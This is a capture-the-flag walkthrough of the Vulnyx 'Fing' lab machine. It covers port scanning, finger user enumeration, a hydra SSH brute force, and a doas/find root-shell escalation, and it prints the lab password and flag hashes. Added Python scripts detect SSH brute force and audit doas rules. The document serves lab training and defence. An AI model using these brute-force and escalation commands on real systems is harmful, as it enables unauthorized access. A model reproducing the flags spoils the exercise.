Vulnyx-Fing-Walkthrough
城南花已开

Information Gathering

Service Detection

BASH
sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.218 08:00:27:56:21:5c PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

16 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.067 seconds (123.85 hosts/sec). 4 responded
export ip=192.168.60.218
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.218:22
Open 192.168.60.218:79
Open 192.168.60.218:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 14:10 CST
Initiating ARP Ping Scan at 14:10
Scanning 192.168.60.218 [1 port]
Completed ARP Ping Scan at 14:10, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:10
Completed Parallel DNS resolution of 1 host. at 14:10, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:10
Scanning 192.168.60.218 [3 ports]
Discovered open port 80/tcp on 192.168.60.218
Discovered open port 79/tcp on 192.168.60.218
Discovered open port 22/tcp on 192.168.60.218
Completed SYN Stealth Scan at 14:10, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.218
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-02-28 14:10:47 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
79/tcp open finger syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:56:21:5C (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

A directory scan turns up nothing at all.

The page source was checked as well; it is no different from the standard default page.

BASH
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.218
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

User Enumeration

Port 79 (finger) is also open, so use a tool to enumerate usernames in bulk.

The user adam exists.

BASH
❯ ./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t $ip
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

----------------------------------------------------------
| Scan Information |
----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Fri Feb 28 14:39:08 2025 #########
adam@192.168.60.218: Login: adam Name: adam..Directory: /home/adam Shell: /bin/bash..Last login Sun Apr 23 13:21 2023 (CEST) on pts/0 from 192.168.1.10..No mail...No Plan...
akemi@192.168.60.218: finger: akemi: no such user...
allys@192.168.60.218: finger: allys: no such user...
amarjit@192.168.60.218: finger: amarjit: no such user...
angie@192.168.60.218: finger: angie: no such user...
anthea@192.168.60.218: finger: anthea: no such user...
arianne@192.168.60.218: finger: arianne: no such user...
asia@192.168.60.218: finger: asia: no such user...
audrie@192.168.60.218: finger: audrie: no such user...
bedford@192.168.60.218: finger: bedford: no such user...
begum@192.168.60.218: finger: begum: no such user...
######## Scan completed at Fri Feb 28 14:39:16 2025 #########
11 results.

10177 queries in 8 seconds (1272.1 queries / sec)

With no other information to go on, the only option left is to brute-force the password.

After a fair while, the password comes back as passion.

BASH
❯ hydra -l adam -P /usr/share/wordlists/rockyou.txt ssh://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-28 14:41:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.60.218:22/
[STATUS] 191.00 tries/min, 191 tries in 00:01h, 14344215 to do in 1251:41h, 9 active
[STATUS] 163.33 tries/min, 490 tries in 00:03h, 14343916 to do in 1463:40h, 9 active
[22][ssh] host: 192.168.60.218 login: adam password: passion
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 7 final worker threads did not complete until end.
[ERROR] 7 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-28 14:46:24
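Seen from the target's side, the hydra run above leaves a dense run of "Failed password" entries in the SSH daemon's log followed by a single "Accepted password" from the same source. The following Python script is an added example (not part of the original walkthrough) that detects exactly that pattern: it parses OpenSSH auth.log lines in the traditional syslog format, flags any source IP with five or more failures inside a sliding 60-second window, and then reports flagged IPs that later logged in successfully. The log lines, host name, PIDs and ports are constructed for the example; the detection thresholds are assumptions and should be tuned per environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of OpenSSH auth.log lines in the traditional syslog
# format (no year field). Hostname, PIDs, ports and the second source
# address are made up for this example.
SAMPLE_AUTH_LOG = """\
Feb 28 14:41:40 fing sshd[1201]: Failed password for adam from 192.168.60.100 port 50112 ssh2
Feb 28 14:41:40 fing sshd[1202]: Failed password for adam from 192.168.60.100 port 50114 ssh2
Feb 28 14:41:41 fing sshd[1203]: Failed password for adam from 192.168.60.100 port 50116 ssh2
Feb 28 14:41:41 fing sshd[1204]: Failed password for invalid user admin from 192.168.60.100 port 50118 ssh2
Feb 28 14:41:42 fing sshd[1205]: Failed password for adam from 192.168.60.100 port 50120 ssh2
Feb 28 14:41:42 fing sshd[1206]: Failed password for adam from 192.168.60.100 port 50122 ssh2
Feb 28 14:46:23 fing sshd[1310]: Accepted password for adam from 192.168.60.100 port 50900 ssh2
Feb 28 14:50:01 fing sshd[1400]: Failed password for alice from 192.168.60.77 port 41000 ssh2
Feb 28 15:10:05 fing sshd[1450]: Accepted publickey for alice from 192.168.60.77 port 41010 ssh2
"""

# One regex covers both outcomes and both authentication methods; the
# optional "invalid user " prefix appears when the account does not exist.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_events(text, year=2025):
    """Turn raw auth.log text into a list of event dicts.

    Syslog timestamps carry no year, so the caller supplies one (assumed
    2025 here to match the walkthrough's dates)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated sshd/PAM lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"],
                       "user": m["user"], "ip": m["ip"]})
    return events


def find_bruteforce(events, threshold=5, window_seconds=60):
    """Return {ip: total_failures} for every source IP that produced at
    least `threshold` failed logins within any `window_seconds` span."""
    failures = defaultdict(list)
    for e in events:
        if e["result"] == "Failed":
            failures[e["ip"]].append(e["ts"])

    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until it fits in the span.
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


def find_success_after_failures(events, flagged):
    """(ip, user) pairs where a flagged source later authenticated
    successfully: the signature of a brute force that worked."""
    return [(e["ip"], e["user"]) for e in events
            if e["result"] == "Accepted" and e["ip"] in flagged]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_AUTH_LOG)
    flagged = find_bruteforce(evs)
    for ip, n in flagged.items():
        print(f"brute-force source {ip}: {n} failed logins")
    for ip, user in find_success_after_failures(evs, flagged):
        print(f"ALERT: {ip} succeeded as {user} after being flagged")
```

On the sample data only 192.168.60.100 is flagged (six failures in two seconds), and its later "Accepted password for adam" is reported as the alert; alice's single failure and key-based login stay below the threshold. In practice the same check is what fail2ban-style tooling automates, and the mitigation the walkthrough's hydra warning hints at (MaxAuthTries, rate limiting, or key-only authentication) removes the password surface altogether.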

User Privilege Escalation

Connect over SSH.

BASH
❯ ssh adam@$ip
The authenticity of host '192.168.60.218 (192.168.60.218)' can't be established.
ED25519 key fingerprint is SHA256:3dqq7f/jDEeGxYQnF2zHbpzEtjjY49/5PvV5/4MMqns.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.218' (ED25519) to the list of known hosts.
adam@192.168.60.218's password:
Linux fing 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64
Last login: Sun Apr 23 13:21:44 2023 from 192.168.1.10
adam@fing:~$ cat user.txt
ff18a9aca2d1dac41a5c26e6667bea9d

Root Privilege Escalation

After enumerating the box, there is no sudo access, but doas is present. Its configuration permits running find as root without a password.

The usual find privilege escalation works as-is.

BASH
adam@fing:/tmp$ cat /etc/doas.conf
permit nopass keepenv adam as root cmd /usr/bin/find
adam@fing:/tmp$ doas /usr/bin/find . -exec /bin/sh \; -quit
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
1edf2dfe68c6745e93affa42be9a80ce
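The doas rule on this box fails in three independent ways: nopass removes authentication, keepenv hands the caller's environment to the privileged process, and find is granted with free arguments, so -exec turns it into a root shell. The Python script below is an added example, not part of the original walkthrough or of doas itself: a small auditor that parses doas.conf rules and reports those problems, run against the page's rule and against a constructed hardened rule that pins the argument list. The parser covers the documented rule grammar (permit/deny, options, identity, as target, cmd, args) but the list of shell-capable binaries is an illustrative assumption, not an exhaustive one.

```python
import os
import shlex

# Binaries that can execute arbitrary commands once running as root
# (find's -exec, editor and pager shell escapes, interpreters).
# Illustrative subset, assumed for this example; not exhaustive.
SHELL_CAPABLE = {"find", "vim", "vi", "less", "more", "awk", "perl",
                 "python3", "bash", "sh", "env", "tar"}

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}


def parse_rule(line):
    """Parse one doas.conf line. Returns None for blanks and comments.

    Grammar: (permit|deny) [options] identity [as target] [cmd command [args ...]]
    When no target is given doas defaults to root."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    tokens = shlex.split(line)
    rule = {"action": tokens[0], "options": [], "identity": None,
            "target": "root", "cmd": None, "args": None}
    i = 1
    while i < len(tokens):
        t = tokens[i]
        if t in OPTIONS:
            rule["options"].append(t)
            i += 1
        elif t == "setenv":  # setenv { VAR=value ... }: skip to closing brace
            rule["options"].append("setenv")
            i = tokens.index("}", i) + 1
        else:
            break
    rule["identity"] = tokens[i]
    i += 1
    if i < len(tokens) and tokens[i] == "as":
        rule["target"] = tokens[i + 1]
        i += 2
    if i < len(tokens) and tokens[i] == "cmd":
        rule["cmd"] = tokens[i + 1]
        i += 2
        if i < len(tokens) and tokens[i] == "args":
            rule["args"] = tokens[i + 1:]  # may be empty: "args" alone pins zero args
    return rule


def audit_rule(rule):
    """Return a list of findings for one parsed permit rule."""
    findings = []
    if rule["action"] != "permit":
        return findings
    if rule["target"] == "root":
        if rule["cmd"] is None:
            findings.append("unrestricted root: any command allowed")
        elif os.path.basename(rule["cmd"]) in SHELL_CAPABLE and rule["args"] is None:
            findings.append(f"{os.path.basename(rule['cmd'])} as root with free "
                            "arguments can spawn a root shell")
    if "nopass" in rule["options"]:
        findings.append("nopass: no authentication required")
    if "keepenv" in rule["options"]:
        findings.append("keepenv: caller's environment reaches the privileged command")
    return findings


def audit_config(text):
    """Map line number -> findings for every rule that has any."""
    report = {}
    for n, line in enumerate(text.splitlines(), 1):
        rule = parse_rule(line)
        if rule and (found := audit_rule(rule)):
            report[n] = found
    return report


# The rule from the walkthrough's /etc/doas.conf.
WEAK = "permit nopass keepenv adam as root cmd /usr/bin/find\n"

# Constructed hardened variant: password required (cached by persist),
# environment dropped, and the argument list pinned so -exec cannot be added.
HARDENED = (
    "# constructed example of a restricted rule\n"
    "permit persist adam as root cmd /usr/bin/find "
    "args /var/log -type f -mtime +30 -print\n"
)

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(f"{label}: {audit_config(cfg) or 'no findings'}")
```

Note that doas matches a pinned args list literally, so the hardened rule only ever runs that one find invocation; if adam genuinely needs broader find access as root, the right fix is a dedicated wrapper script with a fixed argument set rather than the binary itself.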